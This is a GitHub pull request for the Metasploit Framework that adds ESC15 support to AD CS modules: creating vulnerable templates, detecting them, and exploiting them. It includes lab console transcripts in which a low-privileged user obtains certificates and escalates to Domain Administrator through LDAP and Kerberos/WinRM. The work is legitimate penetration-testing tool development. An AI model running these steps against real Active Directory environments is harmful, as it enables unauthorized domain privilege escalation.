Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Support for ESC15 #19538

Merged
merged 7 commits into from
Oct 17, 2024
Merged

Add Support for ESC15 #19538

merged 7 commits into from
Oct 17, 2024

Conversation

zeroSteiner
Copy link
Contributor

@zeroSteiner zeroSteiner commented Oct 8, 2024
edited
Loading

This adds support for ESC15 to various AD CS related modules. A template is added so the ad_cs_cert_template module can create and update templates to be vulnerable to ESC15 (downgrading the schema may not work and should be tested, but creating a net-new one does work). Fingerprinting is added to the ldap_esc_vulnerable_cert_finder module to identify templates that are vulnerable to ESC15. Finally, OIDs can be specified in the icpr_cert module so a vulnerable template can be exploited by a user.

Todo

  • Test the issued certificate authenticates as the user who specified
  • Update the workflow docs for exploiting ESC15
  • Update the icpr_cert docs for the new option
  • Check on and write missing tests as necessary

Demo

Not sure why the session is showing up as from 127.0.0.1 to 127.0.0.1, but with the new ldap whoami changes, it shows that the certificate authenticated as the MSFLAB\smcintyre DA user and not the MSFLAB\mhatter normal user who issued it.

msf6 auxiliary(admin/dcerpc/icpr_cert) > show options 

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   ADD_CERT_APP_POLICY  1.3.6.1.4.1.311.20.2.2;1.3.6.1.5.5.7.3.2  no        Add certificate application policy OIDs
   ALT_DNS                                                        no        Alternative certificate DNS
   ALT_SID                                                        no        Alternative object SID
   ALT_UPN              [email protected]                    no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                   msflab-DC-CA                              yes       The target certificate authority
   CERT_TEMPLATE        ESC15-Test                                yes       The certificate template
   ON_BEHALF_OF                                                   no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                                            no        Certificate to request on behalf of


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC15-Test
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: [email protected]
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 -   * 1.3.6.1.4.1.311.20.2.2 (Smart Card Logon)
[*] 192.168.159.10:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
[*] The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/ldap/ldap_login) > run RHOSTS=192.168.159.10 LDAP::Auth=schannel SSL=true LDAP::CertFile=/home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx

[+] Success: 'Cert File /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx'
[*] LDAP session 2 opened (127.0.0.1 -> 127.0.0.1) at 2024-10-09 15:35:50 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 LDAP session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ldap/ldap_login) > sessions -i -1
[*] Starting interaction with 2...

LDAP (192.168.159.10) > getuid
[*] Server username: MSFLAB\smcintyre
LDAP (192.168.159.10) >

Testing Steps

  • Use the ad_cs_cert_template to create a vulnerable certificate using the new template
    • Use the same module to read the certificate template to see that the schema is 1 and that the Client Authentication EKU is missing
  • Use the ldap_esc_vulnerable_cert_finder module to identify the new template
  • Use the icpr_cert module to issue a certificate
    • Use the new option to specify an EKU to add of 1.3.6.1.5.5.7.3.2 (Client Authentication)
    • Use the ALT_UPN option to specify a privileged user
    • When the certificate is issued, see the EKU that was specified listed as a certificate policy
  • Use the ldap_login module to authenticate using schannel to the server with the certificate
  • Run the getuid command on the session and see that it is authenticated as the user specified in the ALT_UPN datastore argument when the cert was issued

@smcintyre-r7 smcintyre-r7 added needs-docs rn-modules release notes for new or majorly enhanced modules labels Oct 8, 2024
@github-actions GitHub Actions
Copy link

github-actions bot commented Oct 8, 2024

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@zeroSteiner zeroSteiner force-pushed the feat/mod/adcs-esc15 branch 2 times, most recently from 6ed9de2 to 0e3eb45 Compare October 8, 2024 22:00
@zeroSteiner zeroSteiner marked this pull request as ready for review October 9, 2024 21:40
@adfoster-r7
Copy link
Contributor

Would you be able to throw in a quick report_vuln here for the new vuln? 🤞

Or I'm also happy to wait for Christophe to pick up the report_vuln calls in one batch/PR if that's easier 💯

@cdelafuente-r7
Copy link
Contributor

Thanks! I haven't tested it yet, but it looks good to me.

Regarding the report_vuln, is it something we could simply add to #print_vulnerable_cert_info? It looks like the @vuln_certificate_details data structure already has all the informaiton.

@zeroSteiner
Copy link
Contributor Author

Alright with the latest commit in place, I'm reporting all of the vulnerabilities that the module is capable of finding.

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > vulns --info

Vulnerabilities
===============

Timestamp                Host            Name                References                                                    Information
---------                ----            ----                ----------                                                    -----------
2024-10-10 13:23:44 UTC  192.168.159.10  ESC1 - ESC1-Test    https://posts.specterops.io/certified-pre-owned-d95910965cd2  Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs permit authentication
2024-10-10 13:23:44 UTC  192.168.159.10  ESC2 - ESC2-Test    https://posts.specterops.io/certified-pre-owned-d95910965cd2  Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage)
2024-10-10 13:23:44 UTC  192.168.159.10  ESC15 - ESC15-Test  https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc  Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs can be altered (msPKI-Template-Schema
                                                                                                                           -Version)

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >

cdelafuente-r7
cdelafuente-r7 reviewed Oct 14, 2024
View reviewed changes
docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md
Comment on lines +936 to +938
In the following example, the Client Authentication OID (1.3.6.1.5.5.7.3.2) is added which enables the certificate to be
used for authentication to LDAP via SCHANNEL. The operator can then perform LDAP queries with the privileges of the user
specified in the alternate UPN.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Do we have any LDAP module that can be used with this certificate as an example?

lib/msf/core/exploit/remote/ms_icpr.rb Outdated Show resolved Hide resolved
@cdelafuente-r7 cdelafuente-r7 mentioned this pull request Oct 16, 2024
Merged
5 tasks
@cdelafuente-r7 cdelafuente-r7 self-assigned this Oct 17, 2024
@cdelafuente-r7 cdelafuente-r7 merged commit f636a9e into rapid7:master Oct 17, 2024
64 of 70 checks passed
@cdelafuente-r7
Copy link
Contributor

Thanks for updating this @zeroSteiner! Everything looks good to me now.

Scenarios

Check certificate template

msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run verbose=true RHOSTS=10.241.33.12 username=Administrator password=123456 domain=mydomain.local CERT_TEMPLATE=ESC15
[*] Running module against 10.241.33.12

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=ESC15,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mydomain,DC=local
[*] Certificate template data written to: /home/n00tmeg/.msf4/loot/20241017174300_default_10.241.33.12_windows.ad.cs.te_924718.json
[*] Certificate Template:
[*]   distinguishedName: CN=ESC15,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mydomain,DC=local
[*]   displayName:       ESC15
[*]   objectGUID:        f44e1d55-0c7d-4af2-b1f3-88c40c1f69c5
[*]   msPKI-Certificate-Name-Flag: 0x00000001
[*]     * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[*]   msPKI-Enrollment-Flag: 0x00000000
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   msPKI-Template-Schema-Version: 1
[*]   pKIKeyUsage: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.5.5.7.3.1 (Server Authentication)
[*]   pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[*] Auxiliary module execution completed

Check ESC15 with gather/ldap_esc_vulnerable_cert_finder

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run rhosts=10.241.33.12 [email protected] password=vagrant
[*] Running module against 10.241.33.12

[*] Discovering base DN automatically
...[SNIP]...
[+] Template: ESC15
[*]   Distinguished Name: CN=ESC15,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mydomain,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC15
[*]   Notes: ESC15: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs can be altered (msPKI-Template-Schema-Version)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-11 (Authenticated Users)
[+]   Issuing CA: dc-mydomain.local-CA (dc.mydomain.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-130659923-1051543964-1529139330-519 (Enterprise Admins)
[*]       * S-1-5-21-130659923-1051543964-1529139330-512 (Domain Admins)
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                    References
---------                ----          ----                    ----------
2024-10-17 16:41:06 UTC  10.241.33.12  ESC1 - ESC1             https://posts.specterops.io/certified-pre-owned-d95910965cd2
2024-10-17 16:41:07 UTC  10.241.33.12  ESC2 - ESC2             https://posts.specterops.io/certified-pre-owned-d95910965cd2
2024-10-17 16:41:08 UTC  10.241.33.12  ESC3 - ESC3_TEMPLATE_1  https://posts.specterops.io/certified-pre-owned-d95910965cd2
2024-10-17 16:41:12 UTC  10.241.33.12  ESC13 - ESC13           https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
2024-10-17 16:41:13 UTC  10.241.33.12  ESC15 - ESC15           https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc

Client Authentication OID (1.3.6.1.5.5.7.3.2)

msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=dc-mydomain.local-CA RHOSTS=10.241.33.12 username=sandy password=vagrant domain=mydomain.local CERT_TEMPLATE=ESC15 ADD_CERT_APP_POLICY=1.3.6.1.5.5.7.3.2 [email protected]
[*] Running module against 10.241.33.12

[*] 10.241.33.12:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.241.33.12:445 - Binding to \cert...
[+] 10.241.33.12:445 - Bound to \cert
[*] 10.241.33.12:445 - Requesting a certificate for user sandy - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC15
[+] 10.241.33.12:445 - The requested certificate was issued.
[*] 10.241.33.12:445 - Certificate UPN: [email protected]
[*] 10.241.33.12:445 - Certificate Policies:
[*] 10.241.33.12:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*] 10.241.33.12:445 - Certificate stored at: /home/n00tmeg/.msf4/loot/20241017182504_default_10.241.33.12_windows.ad.cs_448124.pfx

msf6 auxiliary(scanner/ldap/ldap_login) > run verbose=true RHOSTS=10.241.33.12 LDAP::Auth=schannel SSL=true username=foo password=bar CreateSession=true Ldap::CertFile=/home/n00tmeg/.msf4/loot/20241017182504_default_10.241.33.12_windows.ad.cs_448124.pfx

[+] Success: 'Cert File /home/n00tmeg/.msf4/loot/20241017182504_default_10.241.33.12_windows.ad.cs_448124.pfx'
[*] LDAP session 1 opened (127.0.0.1 -> 127.0.0.1) at 2024-10-17 18:35:53 +0200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 LDAP session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ldap/ldap_login) > sessions -1
[*] Starting interaction with 1...

LDAP (10.241.33.12) > getuid
[*] Server username: AD\Administrator

Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1)

msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=dc-mydomain.local-CA RHOSTS=10.241.33.12 username=sandy password=vagrant domain=mydomain.local CERT_TEMPLATE=ESC15 ADD_CERT_APP_POLICY=1.3.6.1.4.1.311.20.2.1
[*] Running module against 10.241.33.12

[*] 10.241.33.12:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.241.33.12:445 - Binding to \cert...
[+] 10.241.33.12:445 - Bound to \cert
[*] 10.241.33.12:445 - Requesting a certificate for user sandy - digest algorithm: SHA256 - template: ESC15
[+] 10.241.33.12:445 - The requested certificate was issued.
[*] 10.241.33.12:445 - Certificate Policies:
[*] 10.241.33.12:445 -   * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent)
[*] 10.241.33.12:445 - Certificate stored at: /home/n00tmeg/.msf4/loot/20241017175147_default_10.241.33.12_windows.ad.cs_303720.pfx
[*] Auxiliary module execution completed



msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=dc-mydomain.local-CA RHOSTS=10.241.33.12 username=sandy password=vagrant domain=mydomain.local CERT_TEMPLATE=User on_behalf_of=AD\\administrator pfx=/home/n00tmeg/.msf4/loot/20241017175147_default_10.241.33.12_windows.ad.cs_303720.pfx
[*] Running module against 10.241.33.12

[*] 10.241.33.12:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.241.33.12:445 - Binding to \cert...
[+] 10.241.33.12:445 - Bound to \cert
[*] 10.241.33.12:445 - Building certificate request on behalf of AD\administrator
[*] 10.241.33.12:445 - Requesting a certificate for user sandy - digest algorithm: SHA256 - on behalf of: AD\administrator - template: User
[+] 10.241.33.12:445 - The requested certificate was issued.
[*] 10.241.33.12:445 - Certificate UPN: [email protected]
[*] 10.241.33.12:445 - Certificate stored at: /home/n00tmeg/.msf4/loot/20241017175336_default_10.241.33.12_windows.ad.cs_069695.pfx
[*] Auxiliary module execution completed

msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true RHOSTS=10.241.33.12 cert_file=/home/n00tmeg/.msf4/loot/20241017175336_default_10.241.33.12_windows.ad.cs_069695.pfx
[*] Running module against 10.241.33.12

[*] 10.241.33.12:88 - Getting TGT for [email protected]
[+] 10.241.33.12:88 - Received a valid TGT-Response
[*] 10.241.33.12:88 - TGT MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20241017180144_default_10.241.33.12_mit.kerberos.cca_181591.bin
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) > use scanner/winrm/winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > run verbose=true RHOSTS=10.241.33.12 Winrm::Auth=kerberos Winrm::Rhostname=dc username=administrator domain=mydomain.local DomainControllerRhost=10.241.33.12 cmd=whoami

[*] Using cached credential for krbtgt/[email protected] [email protected]
[+] 10.241.33.12:88 - Received a valid TGS-Response
[*] 10.241.33.12:5985     - TGS MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20241017180202_default_10.241.33.12_mit.kerberos.cca_006143.bin
[+] 10.241.33.12:88 - Received a valid delegation TGS-Response
[+] 10.241.33.12:88 - Received AP-REQ. Extracting session key...
ad\administrator
[+] Results saved to /home/n00tmeg/.msf4/loot/20241017180206_default_10.241.33.12_winrm.cmd_result_670129.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@cdelafuente-r7
Copy link
Contributor

cdelafuente-r7 commented Oct 17, 2024
edited by adfoster-r7
Loading

Release Notes

This adds support for ESC15 to three AD CS related modules. A template is added so the ad_cs_cert_template module can create and update templates to be vulnerable to ESC15. To insure that this works each time, create a net-new template. Fingerprinting is added to the ldap_esc_vulnerable_cert_finder module to identify templates that are vulnerable to ESC15. OIDs can be specified in the icpr_cert module so a vulnerable template can be exploited by a user.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 approved these changes

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@zeroSteiner @adfoster-r7 @cdelafuente-r7 @bwatters-r7 @smcintyre-r7